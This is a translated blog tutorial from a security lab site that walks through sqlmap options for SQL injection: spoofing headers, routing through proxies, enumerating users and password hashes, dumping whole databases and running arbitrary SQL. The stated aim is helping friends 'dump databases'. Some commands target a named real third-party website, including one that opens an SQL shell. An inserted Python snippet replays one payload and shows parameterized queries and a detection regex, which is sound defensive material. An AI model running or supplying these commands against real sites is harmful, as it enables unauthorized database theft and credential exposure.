
Another short guide to sqlmap


sqlmap is an excellent tool for dumping databases, and I am quite fond of it, but my own skills are weak. To make life easier for other friends who want to dump databases, I went through the tutorials of many experts, added my own limited usage experience, and the result is this article. 91ri.org has in fact published sqlmap usage articles before, and they are all fairly good; see "sqlmap Usage Notes" and "SQL Injection with sqlmap".

svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev

sqlmap.py -u "http://www.islamichina.com/hotelinchina.asp?cityid=2&m=1" -v 1 --sql-shell //execute SQL statements

sqlmap.py -u "http://www.islamichina.com/hotelinchina.asp?cityid=2&m=1" -v 5 //more verbose messages

load options from a configuration INI file
sqlmap -c sqlmap.conf

Submit using the POST method
sqlmap.py -u "http://www.91ri.org/ /sqlmap/oracle/post_int.php" --method POST --data "id=1"

Submit using cookies; separate cookie values with ";". TamperData can be used to capture the cookies.
python sqlmap.py -u "http://www.91ri.org/ /sqlmap/mssql/cookie_int.php" --cookie "id=1" -v 1
Use a spoofed Referer
python sqlmap.py -u "http://www.91ri.org/ /sqlmap/pgsql/get_int.php?id=1" --referer "http://www.google.com" -v 3

Use a custom User-Agent, or pick one at random from the bundled user-agents.txt
python sqlmap.py -u "http://www.91ri.org/ /sqlmap/oracle/get_int.php?id=1" --user-agent "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" -v 3

python sqlmap.py -u "http://www.91ri.org/ /sqlmap/mysql/get_int.php?id=1" -v 1 -a "./txt/user-agents.txt"

Use HTTP Basic authentication
python sqlmap.py -u "http://www.91ri.org/ /sqlmap/mysql/basic/get_int.php?id=1" --auth-type Basic --auth-cred "testuser:testpass" -v 3

Use HTTP Digest authentication
python sqlmap.py -u "http://www.91ri.org/ /sqlmap/mysql/digest/get_int.php?id=1" --auth-type Digest --auth-cred "testuser:testpass" -v 3

Use a proxy, in combination with Tor
python sqlmap.py -u "http://www.91ri.org/ /sqlmap/pgsql/get_int.php?id=1" --proxy "http://192.168.1.47:3128"
python sqlmap.py -u "http://www.91ri.org/ /sqlmap/pgsql/get_int.php?id=1" --proxy "http://192.168.1.47:8118"

Use multiple threads for guessing
python sqlmap.py -u "http://www.91ri.org/ /sqlmap/mysql/get_int.php?id=1" -v 1 --current-user --threads 3

Skip the dynamic-parameter detection and name the injectable parameter directly; several parameters can be separated with commas; the User-Agent header can also be named as the injection point
python sqlmap.py -u "http://www.91ri.org/ /sqlmap/pgsql/get_int.php?id=1" -v 1 -p "id"
python sqlmap.py -u "http://www.91ri.org/ /sqlmap/pgsql/get_int.php?id=1&cat=2" -v 1 -p "cat,id"
python sqlmap.py -u "http://www.91ri.org/ /sqlmap/mysql/ua_str.php" -v 1 -p "user-agent" --user-agent "sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)"

Specify the DBMS, skipping sqlmap's automatic detection. Supported values:
python sqlmap.py -u "http://www.91ri.org/ /sqlmap/pgsql/get_int.php?id=1" -v 2 --dbms "PostgreSQL"

* MySQL
* Oracle
* PostgreSQL
* Microsoft SQL Server

Specify the operating system, skipping sqlmap's automatic detection. Supported values:
python sqlmap.py -u "http://www.91ri.org/ /sqlmap/pgsql/get_int.php?id=1" -v 2 --os "Windows"

* Linux
* Windows

Custom payload
Options: --prefix and --postfix

In some situations the vulnerable parameter can only be exploited if the user supplies a postfix to be appended to the injection payload. These options are also convenient when the user already knows the query syntax and wants to detect and exploit the injection directly by supplying a payload prefix and/or postfix.

Example on a MySQL 5.0.67 target on a page where the SQL query is: $query = "SELECT * FROM users WHERE id=('" . $_GET['id'] . "') LIMIT 0, 1";:

$ python sqlmap.py -u "http://www.91ri.org/ /sqlmap/mysql/get_str_brackets.php?id=1" -v 3 -p "id" --prefix "'" --postfix "AND 'test'='test"

[...]
[hh:mm:16] [INFO] testing sql injection on GET parameter 'id' with 0 parenthesis
[hh:mm:16] [INFO] testing custom injection on GET parameter 'id'
[hh:mm:16] [TRAFFIC OUT] HTTP request:
GET /sqlmap/mysql/get_str_brackets.php?id=1%27%29%20AND%207433=7433%20AND%20%28%27test%27=%27test HTTP/1.1
Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
Host: www.91ri.org/ :80
Accept-language: en-us,en;q=0.5
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)
Connection: close
[...]
[hh:mm:17] [INFO] GET parameter 'id' is custom injectable
[...]

As you can see, the injection payload for testing for custom injection is:

id=1%27%29%20AND%207433=7433%20AND%20%28%27test%27=%27test

which URL-decoded is:

id=1') AND 7433=7433 AND ('test'='test

and which, combined with the page's query, yields a syntactically correct statement:

SELECT * FROM users WHERE id=('1') AND 7433=7433 AND ('test'='test') LIMIT 0, 1

In this simple example sqlmap could have detected and exploited the injection without a custom payload, but in real-world use 91ri.org finds it is sometimes necessary to supply one.
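To see why the prefix/postfix payload above works and how the same page query is hardened, here is an added example (not from the original article) that replays the captured GET value against the article's query shape, using sqlite3 as a stand-in for MySQL with a constructed users table, and adds a simple tautology check a defender can run over decoded request parameters.

```python
import re
import sqlite3
from urllib.parse import unquote

# Raw GET value from the request captured in the article.
RAW_PARAM = "1%27%29%20AND%207433=7433%20AND%20%28%27test%27=%27test"


def decode_param(raw: str) -> str:
    """URL-decode the parameter the way the web server does before PHP sees it."""
    return unquote(raw)


def build_concatenated_query(user_input: str) -> str:
    """Mirror the article's PHP query:
    $query = "SELECT * FROM users WHERE id=('" . $_GET['id'] . "') LIMIT 0, 1";"""
    return "SELECT * FROM users WHERE id=('" + user_input + "') LIMIT 0, 1"


def _demo_db() -> sqlite3.Connection:
    """In-memory stand-in for the target's users table (constructed sample rows)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id TEXT, name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", [("1", "alice"), ("2", "bob")])
    return conn


def run_concatenated(user_input: str) -> list:
    """Vulnerable form: the decoded input becomes SQL text, so the payload closes
    the quote and parenthesis and the statement remains syntactically valid."""
    return _demo_db().execute(build_concatenated_query(user_input)).fetchall()


def run_parameterised(user_input: str) -> list:
    """Hardened form: the whole input is bound as one string value, so the quote
    and parenthesis inside it never reach the SQL parser as syntax."""
    return _demo_db().execute(
        "SELECT * FROM users WHERE id=(?) LIMIT 1", (user_input,)
    ).fetchall()


# Always-true comparisons of the kind the probe uses: 7433=7433 or 'x'='x'.
_TAUTOLOGY = re.compile(r"\b(\d+)\s*=\s*\1\b|'(\w+)'\s*=\s*'\2'")


def looks_like_tautology(raw: str) -> bool:
    """Detection check for access logs: flag a decoded parameter that carries a
    self-equal comparison, which a plain integer id never does."""
    return _TAUTOLOGY.search(decode_param(raw)) is not None
```

The concatenated form returns the first user row because every injected condition is true, while the parameterised form returns nothing because no id equals the whole payload string.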

Page comparison
python sqlmap.py -u "http://www.91ri.org/ /sqlmap/mysql/get_int_refresh.php?id=1" --string "luther" -v 1
python sqlmap.py -u "http://www.91ri.org/ /sqlmap/mysql/get_int_refresh.php?id=1" --regexp "lu[\w][\w]er" -v 1

Exclude dynamic page content from the comparison
python sqlmap.py -u "http://www.91ri.org/ /sqlmap/mysql/get_int_refresh.php?id=1" --excl-reg "Dynamic content: ([\d]+)"

Stacked-queries test; note that PHP's built-in mysql_query() does not support multiple statements
python sqlmap.py -u "http://www.91ri.org/ /sqlmap/mysql/get_int.php?id=1" --stacked-test -v 1

UNION injection test
python sqlmap.py -u "http://www.91ri.org/ /sqlmap/oracle/get_int.php?id=1" --union-test -v 1

UNION injection using the ORDER BY technique
python sqlmap.py -u "http://www.91ri.org/ /sqlmap/pgsql/get_str.php?id=1" --union-test --union-tech orderby -v 1

python sqlmap.py -u "http://www.91ri.org/ /sqlmap/mssql/get_int.php?id=1" -v 1 --union-use --banner
python sqlmap.py -u "http://www.91ri.org/ /sqlmap/mysql/get_int.php?id=1" -v 5 --union-use --current-user
python sqlmap.py -u "http://www.91ri.org/ /sqlmap/mysql/get_int_partialunion.php?id=1" -v 1 --union-use --dbs

Fingerprint the DBMS
python sqlmap.py -u "http://www.91ri.org/ /sqlmap/mssql/get_int.php?id=1" -v 1 -f
python sqlmap.py -u "http://192.168.123.36/sqlmap/get_str.asp?name=luther" -v 1 -f -b

Check whether the current user is a DBA
python sqlmap.py -u "http://www.91ri.org/ /sqlmap/pgsql/get_int.php?id=1" --is-dba -v 1

Enumerate database users
python sqlmap.py -u "http://www.91ri.org/ /sqlmap/pgsql/get_int.php?id=1" --users -v 0

Enumerate database user passwords
python sqlmap.py -u "http://www.91ri.org/ /sqlmap/mysql/get_int.php?id=1" --passwords -v 0
python sqlmap.py -u "http://www.91ri.org/ /sqlmap/mssql/get_int.php?id=1" --passwords -U sa -v 0

Check user privileges
python sqlmap.py -u "http://www.91ri.org/ /sqlmap/oracle/get_int.php?id=1" --privileges -v 0
python sqlmap.py -u "http://www.91ri.org/ /sqlmap/pgsql/get_int.php?id=1" --privileges -U postgres -v 0

List databases
python sqlmap.py -u "http://www.91ri.org/ /sqlmap/mssql/get_int.php?id=1" --dbs -v 0

List the columns of a given table in a given database
python sqlmap.py -u "http://www.91ri.org/ /sqlmap/mysql/get_int.php?id=1" --columns -T users -D test -v 1

Dump the contents of a given column of a given table in a given database
python sqlmap.py -u "http://www.91ri.org/ /sqlmap/mssql/get_int.php?id=1" --dump -T users -D master -C surname -v 0

Restrict the dumped entries to the range 2-4
python sqlmap.py -u "http://www.91ri.org/ /sqlmap/mysql/get_int.php?id=1" --dump -T users -D test --start 2 --stop 4 -v 0

Dump the contents of all databases and all tables
python sqlmap.py -u "http://www.91ri.org/ /sqlmap/mysql/get_int.php?id=1" --dump-all -v 0

Dump only user-created databases and tables, excluding the system databases
python sqlmap.py -u "http://www.91ri.org/ /sqlmap/mssql/get_int.php?id=1" --dump-all --exclude-sysdbs -v 0

Run an SQL query
python sqlmap.py -u "http://www.91ri.org/ /sqlmap/pgsql/get_int.php?id=1" --sql-query "SELECT usename FROM pg_user" -v 0
python sqlmap.py -u "http://www.91ri.org/ /sqlmap/mysql/get_int.php?id=1" --sql-query "SELECT host, password FROM mysql.user LIMIT 1, 3" -v 1

SELECT usename, passwd FROM pg_shadow ORDER BY usename

Save and resume the session
python sqlmap.py -u "http://www.91ri.org/ /sqlmap/pgsql/get_int.php?id=1" -b -v 1 -s "sqlmap.log"

Save the options to an INI configuration file
python sqlmap.py -u "http://www.91ri.org/ /sqlmap/pgsql/get_int.php?id=1" -b -v 1 --save

link:http://www.redrain.tk/?p=81

This article was collected and compiled by the information security team of the Network Security Offense and Defense Research Lab (www.91ri.org); please credit the source when reposting.
